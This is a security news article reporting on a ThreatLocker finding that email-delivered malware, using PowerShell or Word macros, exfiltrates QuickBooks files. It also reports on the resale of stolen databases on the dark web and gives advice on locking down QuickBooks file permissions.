Cybercriminals are ready for tax season with new malware designed to exfiltrate Quickbooks data and post it on the internet, according to a new report from ThreatLocker.
Attackers use email to deliver the malware, which the ThreatLocker’s CEO Danny Jenkins told Threatpost is a simple, 15-line piece of code. There are two specific methods attackers used to get the malware to targets: The first is to send a PowerShell command to exfiltrate the data; and the second is to use a Word document to deliver a link or macro to retrieve a file.
After that, the stolen files are sent to the internet, where they’re up for grabs.
“Once the executable or PowerShell command is running, it retrieves your most recently saved Quickbooks’ file location, points to your file share or local file, and proceeds to upload your file to the internet,” the report said.
Jump in PowerShell Access to Quickbooks
Jenkins added that ThreatLocker has seen a six- to seven-times increase in instances of PowerShell accessing QuickBooks in recent weeks. A QuickBooks default permissions setting makes things extra-easy for attackers, according to the firm.
“When Quickbooks is on a file server, you are required to use a Quickbooks Database Server Manager, the report said. “When carrying out a repair, file permissions are reset and the ‘everyone’ group is added to the permission. As a result, access to the database is left wide open and this is a major security concern. ”
Jenkins said he was able to reverse engineer the Quickbooks malware and traced Quickbooks data on the dark web. He found it to be up for sale at prices starting at 100 databases for $100, and “up to thousands of dollars,” for a clean database of financial information with passwords, he explained.
Besides selling the Quickbooks data for a profit, Jenkins said that he predicts the data will also likely be stored and used to power future spear-phishing campaigns, which rely on personal information to tailor social-engineering scams for maximum effect.
Quickbooks Default Permissions
To protect tax data, ThreatLocker recommended making sure the “everyone” group is not selected for Quickbooks permissions — the best idea is to limit access to a single user.
“If you are using a Database Server Manager, be sure to check the permissions after running a database repair and confirm they are locked down,” the report added.
Jenkins said that his company looks at wide trends in data the ThreatLocker solutions encounter across a variety of networks, and said he suspects that Quickbooks attacks are more visible because it’s one of the most-used accounting packages during tax season. He said other, similar software is also likely vulnerable to this type of malware.
Jenkins told Threatpost once attackers have a person’s data, they can use it whenever, wherever and however many times they want, amounting to what can feel like “seven years of bad luck,” following a breach. He added that when this kind of sensitive tax data is exfiltrated without alerting victims, coupled with the potential long-term fallout, it makes these types of attacks a “worst-case scenario.”
